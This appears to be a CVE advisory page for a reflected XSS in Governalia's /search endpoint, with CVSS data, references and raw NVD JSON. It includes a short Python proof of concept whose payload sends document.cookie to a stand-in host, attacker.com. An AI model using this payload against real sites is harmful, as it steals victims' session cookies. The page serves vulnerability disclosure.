CVE-2025-40700

Description

Reflected Cross-Site Scripting (XSS) in IDI Eikon's Governalia. The vulnerability allows an attacker to execute JavaScript code in the victim's browser when a malicious URL with the 'q' parameter in '/search' is sent to them. This vulnerability can be exploited to steal sensitive information such as session cookies or to perform actions on behalf of the victim.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:idieikon:governalia:*:*:*:*:*:*:*:* - VULNERABLE

IDI Eikon's Governalia (版本未知)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-40700 PoC - Reflected XSS in IDI Eikon's Governalia
# Target: /search endpoint with 'q' parameter

TARGET_URL = "http://target-site.com/search"

# Malicious payload to steal cookies
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

# Construct malicious URL
malicious_url = f"{TARGET_URL}?q={requests.utils.quote(xss_payload)}"

print(f"[*] Target: {TARGET_URL}")
print(f"[*] Malicious URL: {malicious_url}")
print(f"[*] Payload: {xss_payload}")

# Verify the vulnerability exists
response = requests.get(malicious_url)

if xss_payload in response.text:
    print("[+] VULNERABLE: XSS payload reflected in response")
else:
    print("[-] Not vulnerable or payload filtered")

# Simple test payload
simple_payload = "<img src=x onerror=alert('XSS')>"
test_url = f"{TARGET_URL}?q={requests.utils.quote(simple_payload)}"
print(f"[*] Test URL: {test_url}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40700
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40700
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40700/
[4] VulDB https://vuldb.com/cve/CVE-2025-40700
[5] https://governalia.es/
[6] https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-governalia-idi-eikon

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40700", "sourceIdentifier": "[email protected]", "published": "2025-12-02T13:15:53.537", "lastModified": "2026-01-30T19:13:04.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reflected Cross-Site Scripting (XSS) in IDI Eikon's Governalia. The vulnerability allows an attacker to execute JavaScript code in the victim's browser when a malicious URL with the 'q' parameter in '/search' is sent to them. This vulnerability can be exploited to steal sensitive information such as session cookies or to perform actions on behalf of the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:idieikon:governalia:*:*:*:*:*:*:*:*", "versionEndExcluding": "1274", "matchCriteriaId": "79E4E4A3-F80F-4DE0-AE77-F84261752E4B"}]}]}], "references": [{"url": "https://governalia.es/", "source": "[email protected]", "tags": ["Product", "US Government Resource"]}, {"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-governalia-idi-eikon", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}